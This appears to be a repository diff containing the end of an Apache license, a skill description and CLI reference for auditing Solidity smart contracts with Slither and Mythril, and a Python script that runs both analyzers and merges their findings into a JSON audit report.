          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,71 @@
 ---
 name: analyzing-ethereum-smart-contract-vulnerabilities
 description: Perform static and symbolic analysis of Solidity smart contracts using
  Slither and Mythril to detect reentrancy, integer overflow, access control, and
  other vulnerability classes before deployment to Ethereum mainnet.
 domain: cybersecurity
 subdomain: blockchain-security
 tags:
 - ethereum
 - solidity
 - smart-contract
 - slither
 - mythril
 - blockchain
 - defi
 - audit
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.DS-01
 - PR.DS-02
 - ID.RA-01
 mitre_attack:
 - T1190
 - T1059
 ---
 # Analyzing Ethereum Smart Contract Vulnerabilities
 ## Overview
 Smart contract vulnerabilities have led to billions of dollars in losses across DeFi protocols. Unlike traditional software, deployed smart contracts are immutable and handle real financial assets, making pre-deployment security analysis critical. Slither performs fast static analysis using an intermediate representation to detect over 90 vulnerability patterns in seconds, while Mythril uses symbolic execution and SMT solving to discover complex execution path vulnerabilities like reentrancy and integer overflows. This skill covers running both tools against Solidity contracts, interpreting results, triaging findings by severity, and generating audit reports.
 ## When to Use
 - When investigating security incidents that require analyzing ethereum smart contract vulnerabilities
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.10+ with pip
 - Slither (pip install slither-analyzer) and solc compiler
 - Mythril (pip install mythril) with solc-select for compiler version management
 - Solidity source code or compiled contract bytecode
 - Foundry or Hardhat development framework (optional, for project-level analysis)
 ## Steps
 ### Step 1: Run Slither Static Analysis
 Execute Slither against the contract codebase to identify vulnerability patterns, optimization opportunities, and code quality issues using its 90+ built-in detectors.
 ### Step 2: Run Mythril Symbolic Execution
 Run Mythril deep analysis to explore execution paths and discover reentrancy, unchecked external calls, and arithmetic vulnerabilities that require path-sensitive analysis.
 ### Step 3: Triage and Correlate Findings
 Combine results from both tools, deduplicate findings, assess severity based on exploitability and financial impact, and filter false positives.
 ### Step 4: Generate Audit Report
 Produce a structured audit report with vulnerability descriptions, affected code locations, exploit scenarios, and remediation recommendations.
 ## Expected Output
 JSON report listing vulnerabilities with SWC (Smart Contract Weakness Classification) identifiers, severity ratings, affected functions, and suggested fixes.
@@ -0,0 +1,103 @@
 # API Reference: Analyzing Ethereum Smart Contract Vulnerabilities
 ## Slither CLI
 ```bash
 # Basic analysis
 slither contracts/
 # JSON output
 slither contracts/ --json slither-report.json
 # Run specific detector only
 slither contracts/ --detect reentrancy-eth,unprotected-upgrade
 # List all detectors
 slither --list-detectors
 # Print contract summary
 slither contracts/ --print human-summary
 # Generate inheritance graph
 slither contracts/ --print inheritance-graph
 ```
 ## Mythril CLI
 ```bash
 # Analyze single contract
 myth analyze contracts/Token.sol
 # JSON output
 myth analyze contracts/Token.sol -o json
 # Set execution timeout
 myth analyze contracts/Token.sol --execution-timeout 300
 # Analyze deployed bytecode
 myth analyze --address 0x1234... --rpc infura
 # Increase analysis depth
 myth analyze contracts/Token.sol --max-depth 50 --transaction-count 3
 ```
 ## Slither Detector Severity Levels
 | Impact | Confidence | Example Detectors |
 |--------|------------|-------------------|
 | High | High | reentrancy-eth, suicidal, arbitrary-send-eth |
 | High | Medium | controlled-delegatecall, reentrancy-no-eth |
 | Medium | High | locked-ether, incorrect-equality |
 | Medium | Medium | uninitialized-state, shadowing-state |
 | Low | High | naming-convention, solc-version |
 | Informational | High | pragma, dead-code |
 ## SWC Registry (Key Entries)
 | SWC ID | Title | Tool Coverage |
 |--------|-------|---------------|
 | SWC-101 | Integer Overflow/Underflow | Mythril |
 | SWC-104 | Unchecked Call Return | Slither + Mythril |
 | SWC-106 | Unprotected SELFDESTRUCT | Slither + Mythril |
 | SWC-107 | Reentrancy | Slither + Mythril |
 | SWC-110 | Assert Violation | Mythril |
 | SWC-112 | Delegatecall to Untrusted Callee | Slither |
 | SWC-115 | tx.origin Authentication | Slither |
 | SWC-116 | Block Timestamp Dependence | Mythril |
 | SWC-120 | Weak Randomness | Slither |
 ## Installation
 ```bash
 # Slither (requires solc)
 pip install slither-analyzer
 solc-select install 0.8.20
 solc-select use 0.8.20
 # Mythril
 pip install mythril
 ```
 ## Slither JSON Output Structure
 ```json
 {
  "success": true,
  "results": {
    "detectors": [{
      "check": "reentrancy-eth",
      "impact": "High",
      "confidence": "Medium",
      "description": "Reentrancy in Contract.withdraw()",
      "elements": [{"source_mapping": {"filename_short": "Contract.sol", "lines": [42, 43]}}]
    }]
  }
 }
 ```
 ### References
 - Slither: https://github.com/crytic/slither
 - Mythril: https://github.com/Consensys/mythril
 - SWC Registry: https://swcregistry.io/
 - Solidity Security: https://docs.soliditylang.org/en/latest/security-considerations.html
@@ -0,0 +1,168 @@
 #!/usr/bin/env python3
 """Smart Contract Security Agent - runs Slither and Mythril analysis on Solidity contracts."""
 import json
 import argparse
 import logging
 import subprocess
 from collections import defaultdict
 from datetime import datetime
 logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
 logger = logging.getLogger(__name__)
 SWC_REGISTRY = {
    "SWC-101": "Integer Overflow and Underflow",
    "SWC-104": "Unchecked Call Return Value",
    "SWC-106": "Unprotected SELFDESTRUCT",
    "SWC-107": "Reentrancy",
    "SWC-110": "Assert Violation",
    "SWC-112": "Delegatecall to Untrusted Callee",
    "SWC-113": "DoS with Failed Call",
    "SWC-115": "Authorization through tx.origin",
    "SWC-116": "Block values as a proxy for time",
    "SWC-120": "Weak Sources of Randomness",
 }
 def run_slither(contract_path):
    """Run Slither static analysis on Solidity contract."""
    cmd = ["slither", contract_path, "--json", "-"]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
    try:
        return json.loads(result.stdout) if result.stdout else {}
    except json.JSONDecodeError:
        logger.error("Slither JSON parse failed")
        return {}
 def run_mythril(contract_path, timeout=300):
    """Run Mythril symbolic execution analysis."""
    cmd = ["myth", "analyze", contract_path, "--execution-timeout", str(timeout), "-o", "json"]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout + 60)
    try:
        return json.loads(result.stdout) if result.stdout else {}
    except json.JSONDecodeError:
        logger.error("Mythril JSON parse failed")
        return {}
 def analyze_slither_results(slither_output):
    """Parse and categorize Slither detector findings."""
    findings = []
    by_severity = defaultdict(int)
    by_detector = defaultdict(int)
    for detector in slither_output.get("results", {}).get("detectors", []):
        severity = detector.get("impact", "informational").lower()
        by_severity[severity] += 1
        det_name = detector.get("check", "unknown")
        by_detector[det_name] += 1
        elements = detector.get("elements", [])
        location = ""
        if elements:
            elem = elements[0]
            location = f"{elem.get('source_mapping', {}).get('filename_short', '')}:" \
                       f"L{elem.get('source_mapping', {}).get('lines', [0])[0] if elem.get('source_mapping', {}).get('lines') else 0}"
        findings.append({
            "detector": det_name,
            "severity": severity,
            "description": detector.get("description", "")[:200],
            "location": location,
            "confidence": detector.get("confidence", ""),
        })
    return {
        "total": len(findings),
        "by_severity": dict(by_severity),
        "by_detector": dict(sorted(by_detector.items(), key=lambda x: x[1], reverse=True)[:15]),
        "findings": sorted(findings, key=lambda x: {"high": 0, "medium": 1, "low": 2, "informational": 3}.get(x["severity"], 4)),
    }
 def analyze_mythril_results(mythril_output):
    """Parse Mythril symbolic execution findings."""
    findings = []
    by_swc = defaultdict(int)
    for issue in mythril_output.get("issues", []):
        swc_id = issue.get("swc-id", "")
        swc_key = f"SWC-{swc_id}" if swc_id else "unknown"
        by_swc[swc_key] += 1
        severity = issue.get("severity", "Medium").lower()
        findings.append({
            "swc_id": swc_key,
            "swc_title": SWC_REGISTRY.get(swc_key, issue.get("title", "")),
            "severity": severity,
            "description": issue.get("description", "")[:200],
            "contract": issue.get("contract", ""),
            "function": issue.get("function", ""),
            "line_number": issue.get("lineno", 0),
        })
    return {
        "total": len(findings),
        "by_swc": dict(by_swc),
        "findings": findings,
    }
 def deduplicate_findings(slither_findings, mythril_findings):
    """Merge and deduplicate findings from both tools."""
    combined = []
    seen = set()
    for f in slither_findings.get("findings", []):
        key = (f.get("location", ""), f.get("detector", ""))
        if key not in seen:
            seen.add(key)
            combined.append({**f, "source": "slither"})
    for f in mythril_findings.get("findings", []):
        key = (f.get("contract", "") + str(f.get("line_number", 0)), f.get("swc_id", ""))
        if key not in seen:
            seen.add(key)
            combined.append({**f, "source": "mythril"})
    return combined
 def generate_report(contract_path, slither_analysis, mythril_analysis, combined):
    critical_high = sum(1 for f in combined if f.get("severity") in ("high", "critical"))
    return {
        "timestamp": datetime.utcnow().isoformat(),
        "contract": contract_path,
        "slither_analysis": {
            "total_findings": slither_analysis["total"],
            "by_severity": slither_analysis["by_severity"],
            "top_detectors": slither_analysis["by_detector"],
        },
        "mythril_analysis": {
            "total_findings": mythril_analysis["total"],
            "by_swc": mythril_analysis["by_swc"],
        },
        "combined_findings": len(combined),
        "critical_high_findings": critical_high,
        "audit_result": "FAIL" if critical_high > 0 else "PASS",
        "findings": combined[:30],
    }
 def main():
    parser = argparse.ArgumentParser(description="Solidity Smart Contract Security Analysis Agent")
    parser.add_argument("--contract", required=True, help="Path to Solidity contract or project directory")
    parser.add_argument("--mythril-timeout", type=int, default=300, help="Mythril execution timeout (seconds)")
    parser.add_argument("--skip-mythril", action="store_true", help="Skip Mythril (slow symbolic execution)")
    parser.add_argument("--output", default="smart_contract_audit_report.json")
    args = parser.parse_args()
    slither_output = run_slither(args.contract)
    slither_analysis = analyze_slither_results(slither_output)
    mythril_analysis = {"total": 0, "by_swc": {}, "findings": []}
    if not args.skip_mythril:
        mythril_output = run_mythril(args.contract, args.mythril_timeout)
        mythril_analysis = analyze_mythril_results(mythril_output)
    combined = deduplicate_findings(slither_analysis, mythril_analysis)
    report = generate_report(args.contract, slither_analysis, mythril_analysis, combined)
    with open(args.output, "w") as f:
        json.dump(report, f, indent=2, default=str)
    logger.info("Smart contract audit: %d findings (%d critical/high), result: %s",
                report["combined_findings"], report["critical_high_findings"], report["audit_result"])
    print(json.dumps(report, indent=2, default=str))
 if __name__ == "__main__":
    main()
--- a/Show More
+++ b/Show More
		`@@ -0,0 +1,2 @@`
							`github: mukul975`
							`custom: ["https://paypal.me/mahipaljangra"]`